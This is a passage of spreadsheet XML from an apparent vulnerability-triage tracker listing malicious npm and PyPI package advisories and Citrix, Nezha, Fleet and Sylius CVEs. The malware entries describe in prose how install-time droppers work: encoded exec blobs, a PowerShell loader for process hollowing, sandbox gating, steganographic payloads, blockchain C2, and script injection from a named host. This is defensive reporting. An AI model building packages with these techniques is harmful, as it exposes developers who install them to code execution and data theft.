The package's main module is an IIFE that injects a &lt;script&gt; element pointing at the hardcoded URL https://nee1ahnaw7.xsses.link and appends it to the document, causing whatever JavaScript that host serves to execute in the caller's page context. The destination is unpinned, opaque, unrelated to the package's declared identity or publisher, and the host name aligns with XSS/payload delivery infrastructure. Any application that bundles this dependency will fetch and execute attacker-controlled JavaScript at runtime, granting full code execution within the app's origin — enabling credential/session theft, arbitrary DOM manipulation, and further payload staging.
</t>
        </is>
      </c>
      <c r="T408" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17238</t>
        </is>
      </c>
    </row>
    <row r="409">
      <c r="A409" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B409" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C409" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17239</t>
        </is>
      </c>
      <c r="D409" s="5" t="inlineStr"/>
      <c r="E409" s="5" t="inlineStr"/>
      <c r="F409" s="5" t="inlineStr"/>
      <c r="G409" s="5" t="inlineStr"/>
      <c r="H409" s="5" t="inlineStr"/>
      <c r="I409" s="5" t="inlineStr"/>
      <c r="J409" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K409" s="5" t="inlineStr"/>
      <c r="L409" s="5" t="inlineStr">
        <is>
          <t>npm:test-agency-assignment</t>
        </is>
      </c>
      <c r="M409" s="5" t="inlineStr"/>
      <c r="N409" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O409" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P409" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q409" s="5" t="inlineStr"/>
      <c r="R409" s="5" t="inlineStr"/>
      <c r="S409" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (dcdf62e1c1eb44ca7a29ed37c12bdb71883025a46c5066e58c9228f0dfe782c2)
package.json declares a postinstall lifecycle script `wscript.exe 4444.vbs`, causing the VBS file shipped in the tarball to run automatically on `npm install` on Windows hosts. 4444.vbs contains a hand-rolled multi-layer decoder (Base64, an XOR-masked AES S-box, ChaCha20-IETF, additional XOR) that concatenates hundreds of embedded ~2KiB Base64 chunks stored in `ArtifactBundleHX(...)`, decrypts them, writes the resulting PowerShell loader to a randomly named file under %TEMP% (`pf&lt;rand&gt;.dat`), and invokes powershell.exe against it. In-file comments describe the handoff to PowerShell as being for process hollowing. The file header presents a benign 'Device Telemetry Aggregator' cover story that does not match the shipped behavior. The package's only functional content is this dropper; installing the package on Windows results in arbitrary attacker-controlled code execution on the installer's host.
</t>
        </is>
      </c>
      <c r="T409" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17239</t>
        </is>
      </c>
    </row>
    <row r="410">
      <c r="A410" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B410" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C410" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17240</t>
        </is>
      </c>
      <c r="D410" s="5" t="inlineStr"/>
      <c r="E410" s="5" t="inlineStr"/>
      <c r="F410" s="5" t="inlineStr"/>
      <c r="G410" s="5" t="inlineStr"/>
      <c r="H410" s="5" t="inlineStr"/>
      <c r="I410" s="5" t="inlineStr"/>
      <c r="J410" s="5" t="inlineStr">
        <is>
          <t>pypi</t>
        </is>
      </c>
      <c r="K410" s="5" t="inlineStr"/>
      <c r="L410" s="5" t="inlineStr">
        <is>
          <t>PyPI:aseitylab</t>
        </is>
      </c>
      <c r="M410" s="5" t="inlineStr"/>
      <c r="N410" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O410" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P410" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q410" s="5" t="inlineStr"/>
      <c r="R410" s="5" t="inlineStr"/>
      <c r="S410" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (9b47f0f7a0776cad3d4c83604d35a0023a250d2f035e58129233095aa2b110a3)
aseitylab/_shimdata.py contains a large base85-encoded, zlib-compressed blob stored as DATA. aseitylab/compat.py defines _ensure_compat(), which base85-decodes and zlib-inflates DATA and passes the result to exec(compile(..., '&lt;aseitylab-compat&gt;', 'exec')). setup.py imports aseitylab.compat and invokes _ensure_compat() during package build/install, and aseitylab/__init__.py calls the same function on every import, so the decoded payload runs both when the package is installed and whenever it is imported. Execution is gated by environment variables (ASEITYLAB_COMPAT=0, DAS_STAGED=1) that allow the payload to be suppressed in build or test environments. The README advertises a pure-Python task-orchestration toolkit with no runtime dependencies, which does not require a compressed, encoded executable blob shipped as 'compatibility shim data'. MANIFEST.in additionally excludes file names (loader_payload.py, make_armed.py, armed.json, manifest.benign.json) consistent with a build harness that produces separate 'armed' and 'benign' tarballs. The contents of the executed payload are not inspectable from the shipped source; installing or importing the package hands arbitrary code execution to whatever DATA decodes to.
## Source: kam193 (24b99c2059065cbe44f7dac2f1d2878b237c58150c0890baa1856852e76fcb24)
During installation, obfuscated code is used to fetch code hidden in an image containing a Python application with a native extension module. This module holds an obfuscated infostealer which collects sensitive data and exfiltrates them to a C2 server retrieved from transaction history in the Polygon blockchain.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-09-donutautosellsrc
Reasons (based on the campaign):
 - infostealer
 - Downloads and executes a remote executable.
 - obfuscation
 - The package contains code to detect if it is running in a sandbox environment.
 - malware
 - native-extension
 - steganography
 - c2-in-blockchain
</t>
        </is>
      </c>
      <c r="T410" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17240</t>
        </is>
      </c>
    </row>
    <row r="411">
      <c r="A411" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B411" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.5 → 9.8)</t>
        </is>
      </c>
      <c r="C411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88771</t>
        </is>
      </c>
      <c r="D411" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E411" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F411" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G411" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H411" s="5" t="inlineStr"/>
      <c r="I411" s="5" t="inlineStr"/>
      <c r="J411" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K411" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L411" s="5" t="inlineStr"/>
      <c r="M411" s="5" t="inlineStr"/>
      <c r="N411" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O411" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P411" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q411" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="R411" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S411" s="5" t="inlineStr">
        <is>
          <t>Improper input validation vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23 leading to an unauthenticated attacker to execute arbitrary commands.</t>
        </is>
      </c>
      <c r="T411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88771</t>
        </is>
      </c>
    </row>
    <row r="412">
      <c r="A412" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B412" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.5 → 8.1)</t>
        </is>
      </c>
      <c r="C412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88772</t>
        </is>
      </c>
      <c r="D412" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E412" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F412" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G412" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H412" s="5" t="inlineStr"/>
      <c r="I412" s="5" t="inlineStr"/>
      <c r="J412" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K412" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L412" s="5" t="inlineStr"/>
      <c r="M412" s="5" t="inlineStr"/>
      <c r="N412" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O412" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P412" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q412" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="R412" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S412" s="5" t="inlineStr">
        <is>
          <t>Vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23 leading to Remote Code Execution or Denial of Service</t>
        </is>
      </c>
      <c r="T412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88772</t>
        </is>
      </c>
    </row>
    <row r="413">
      <c r="A413" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B413" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.3 → 10.0)</t>
        </is>
      </c>
      <c r="C413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88773</t>
        </is>
      </c>
      <c r="D413" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E413" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F413" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G413" s="5" t="inlineStr"/>
      <c r="H413" s="5" t="inlineStr"/>
      <c r="I413" s="5" t="inlineStr"/>
      <c r="J413" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K413" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L413" s="5" t="inlineStr"/>
      <c r="M413" s="5" t="inlineStr"/>
      <c r="N413" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O413" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P413" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q413" s="5" t="inlineStr"/>
      <c r="R413" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="S413" s="5" t="inlineStr">
        <is>
          <t>Inconsistent interpretation of HTTP requests ('HTTP Request/Response smuggling') vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1-37.279 and NDcPP; Gateway: before 14.1-73.37 FIPS and before 13.1-64.23.</t>
        </is>
      </c>
      <c r="T413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88773</t>
        </is>
      </c>
    </row>
    <row r="414">
      <c r="A414" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B414" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.8 → 9.8)</t>
        </is>
      </c>
      <c r="C414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88775</t>
        </is>
      </c>
      <c r="D414" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E414" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F414" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G414" s="5" t="inlineStr"/>
      <c r="H414" s="5" t="inlineStr"/>
      <c r="I414" s="5" t="inlineStr"/>
      <c r="J414" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K414" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L414" s="5" t="inlineStr"/>
      <c r="M414" s="5" t="inlineStr"/>
      <c r="N414" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O414" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P414" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q414" s="5" t="inlineStr"/>
      <c r="R414" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="S414" s="5" t="inlineStr">
        <is>
          <t>Memory overflow vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23 leading Memory overflow vulnerability leading to unpredictable or erroneous behavior or Denial of Service</t>
        </is>
      </c>
      <c r="T414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88775</t>
        </is>
      </c>
    </row>
    <row r="415">
      <c r="A415" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B415" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.8 → 9.8)</t>
        </is>
      </c>
      <c r="C415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88776</t>
        </is>
      </c>
      <c r="D415" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E415" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F415" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G415" s="5" t="inlineStr"/>
      <c r="H415" s="5" t="inlineStr"/>
      <c r="I415" s="5" t="inlineStr"/>
      <c r="J415" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K415" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L415" s="5" t="inlineStr"/>
      <c r="M415" s="5" t="inlineStr"/>
      <c r="N415" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O415" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P415" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q415" s="5" t="inlineStr"/>
      <c r="R415" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S415" s="5" t="inlineStr">
        <is>
          <t>Memory overflow vulnerability vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23  leading to unpredictable or erroneous behavior or Denial of Service</t>
        </is>
      </c>
      <c r="T415" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88776</t>
        </is>
      </c>
    </row>
    <row r="416">
      <c r="A416" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B416" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.8 → 9.8)</t>
        </is>
      </c>
      <c r="C416" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88777</t>
        </is>
      </c>
      <c r="D416" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E416" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G416" s="5" t="inlineStr"/>
      <c r="H416" s="5" t="inlineStr"/>
      <c r="I416" s="5" t="inlineStr"/>
      <c r="J416" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K416" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler_application_delivery_controller, citrix:netscaler_gateway</t>
        </is>
      </c>
      <c r="L416" s="5" t="inlineStr"/>
      <c r="M416" s="5" t="inlineStr"/>
      <c r="N416" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O416" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P416" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q416" s="5" t="inlineStr"/>
      <c r="R416" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S416" s="5" t="inlineStr">
        <is>
          <t>Memory overflow vulnerability vulnerability in Citrix NetScaler ADC and Citrix NetScaler Gateway.
This issue affects ADC: before 14.1-73.37, before 13.1-64.23, before 14.1-73.37 FIPS, and before 13.1.37.279 FIPS and NDcPP; Gateway: before 14.1-73.37 and before 13.1-64.23  leading to unpredictable or erroneous behavior or Denial of Service</t>
        </is>
      </c>
      <c r="T416" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88777</t>
        </is>
      </c>
    </row>
    <row r="417">
      <c r="A417" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B417" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (10.0 → 9.3)</t>
        </is>
      </c>
      <c r="C417" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100886</t>
        </is>
      </c>
      <c r="D417" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E417" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F417" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G417" s="5" t="inlineStr"/>
      <c r="H417" s="5" t="inlineStr"/>
      <c r="I417" s="5" t="inlineStr"/>
      <c r="J417" s="5" t="inlineStr"/>
      <c r="K417" s="5" t="inlineStr"/>
      <c r="L417" s="5" t="inlineStr"/>
      <c r="M417" s="5" t="inlineStr"/>
      <c r="N417" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O417" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P417" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q417" s="5" t="inlineStr"/>
      <c r="R417" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S417" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Seetong T8108, T8108P, T8116 and T8232 4.6.1.4-build202604241011. The affected element is an unknown function of the component Debug Service. Such manipulation leads to improper authentication. The attack may be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T417" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100886</t>
        </is>
      </c>
    </row>
    <row r="418">
      <c r="A418" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B418" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (10.0 → 9.3)</t>
        </is>
      </c>
      <c r="C418" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101001</t>
        </is>
      </c>
      <c r="D418" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E418" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F418" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G418" s="5" t="inlineStr"/>
      <c r="H418" s="5" t="inlineStr"/>
      <c r="I418" s="5" t="inlineStr"/>
      <c r="J418" s="5" t="inlineStr"/>
      <c r="K418" s="5" t="inlineStr"/>
      <c r="L418" s="5" t="inlineStr"/>
      <c r="M418" s="5" t="inlineStr"/>
      <c r="N418" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O418" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P418" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q418" s="5" t="inlineStr"/>
      <c r="R418" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S418" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in Netcore NBR200V2 1.3.241127.071246. This impacts the function eval of the file /www/cgi-bin/network_tools of the component Web Management Interface. Such manipulation of the argument QUERY_STRING leads to os command injection. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T418" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101001</t>
        </is>
      </c>
    </row>
    <row r="419">
      <c r="A419" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B419" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.8 → 9.3)</t>
        </is>
      </c>
      <c r="C419" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101090</t>
        </is>
      </c>
      <c r="D419" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E419" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F419" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G419" s="5" t="inlineStr"/>
      <c r="H419" s="5" t="inlineStr"/>
      <c r="I419" s="5" t="inlineStr"/>
      <c r="J419" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K419" s="5" t="inlineStr"/>
      <c r="L419" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/nezhahq/nezha</t>
        </is>
      </c>
      <c r="M419" s="5" t="inlineStr"/>
      <c r="N419" s="5" t="inlineStr">
        <is>
          <t>NVD, OSV</t>
        </is>
      </c>
      <c r="O419" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P419" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q419" s="5" t="inlineStr"/>
      <c r="R419" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="S419" s="5" t="inlineStr">
        <is>
          <t>Nezha 2.2.3 contains a Host header injection regression in the OAuth2 redirect endpoint. When the new optional dashboard_host setting is empty, /api/v1/oauth2/{provider} (cmd/dashboard/controller/oauth2.go) reflects the attacker-supplied HTTP Host header into the redirect_uri sent to the identity provider instead of falling back to the configured install_host. An attacker who induces a victim to begin OAuth2 login via a request that reaches Nezha with a forged Host header can cause an attacker-controlled callback URL to be used as the redirect_uri; if the OAuth2 provider accepts it, the victim's authorization code is delivered to the attacker origin, allowing the attacker to complete the OAuth2 login/binding flow and take over the account. This regresses the fix for GHSA-9rc6-8cjv-rcvx and is configuration-dependent (dashboard_host empty). At the time of the advisory no patched version was available.</t>
        </is>
      </c>
      <c r="T419" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101090</t>
        </is>
      </c>
    </row>
    <row r="420">
      <c r="A420" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B420" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (8.0 → 8.9)</t>
        </is>
      </c>
      <c r="C420" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101045</t>
        </is>
      </c>
      <c r="D420" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E420" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F420" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G420" s="5" t="inlineStr"/>
      <c r="H420" s="5" t="inlineStr"/>
      <c r="I420" s="5" t="inlineStr"/>
      <c r="J420" s="5" t="inlineStr"/>
      <c r="K420" s="5" t="inlineStr"/>
      <c r="L420" s="5" t="inlineStr"/>
      <c r="M420" s="5" t="inlineStr"/>
      <c r="N420" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O420" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P420" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q420" s="5" t="inlineStr"/>
      <c r="R420" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S420" s="5" t="inlineStr">
        <is>
          <t>Fleet-maintained app install and uninstall scripts for macOS are generated from Homebrew cask metadata. In manifests generated before 2026-08-19, the script generator escaped this metadata at some interpolation sites but not all of them, so cask metadata containing shell metacharacters (for example $(...) command substitution) could be carried into scripts that execute as root on managed macOS hosts. An attacker who could land crafted metadata in an upstream Homebrew cask — without needing any Fleet credentials — could achieve arbitrary command execution as root on managed macOS hosts that install or uninstall the affected Fleet-maintained app; exploitation required the crafted metadata to pass both upstream Homebrew cask review and Fleet's review of the automated ingestion pull request. The fix (fleetdm/fleet#51324) landed in Fleet's ingestion pipeline on 2026-08-19 so that all manifests generated on or after that date escape cask metadata at every interpolation site; because manifests are generated centrally and distributed as pre-built content, remediation applied to all deployments with no customer action, and the code fix is included in Fleet v4.92.0.</t>
        </is>
      </c>
      <c r="T420" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101045</t>
        </is>
      </c>
    </row>
    <row r="421">
      <c r="A421" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B421" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.5 → 8.7)</t>
        </is>
      </c>
      <c r="C421" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100872</t>
        </is>
      </c>
      <c r="D421" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E421" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F421" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G421" s="5" t="inlineStr"/>
      <c r="H421" s="5" t="inlineStr"/>
      <c r="I421" s="5" t="inlineStr"/>
      <c r="J421" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K421" s="5" t="inlineStr"/>
      <c r="L421" s="5" t="inlineStr"/>
      <c r="M421" s="5" t="inlineStr"/>
      <c r="N421" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O421" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P421" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q421" s="5" t="inlineStr"/>
      <c r="R421" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="S421" s="5" t="inlineStr">
        <is>
          <t>Sylius versions before 2.1.16 and 2.2.9 fail to validate payment amounts during cart recalculation, allowing unauthenticated attackers to modify order totals after gateway transaction initiation. Attackers can pay a small amount, enlarge the order after gateway capture, and have the system mark the inflated order as fully paid while the gateway captured only the original amount.</t>
        </is>
      </c>
      <c r="T421" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100872</t>
        </is>
      </c>
    </row>
    <row r="422">
      <c r="A422" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B422" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (9.9 → 8.6)</t>
        </is>
      </c>
      <c r="C422" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100896</t>
        </is>
      </c>
      <c r="D422" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E422" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
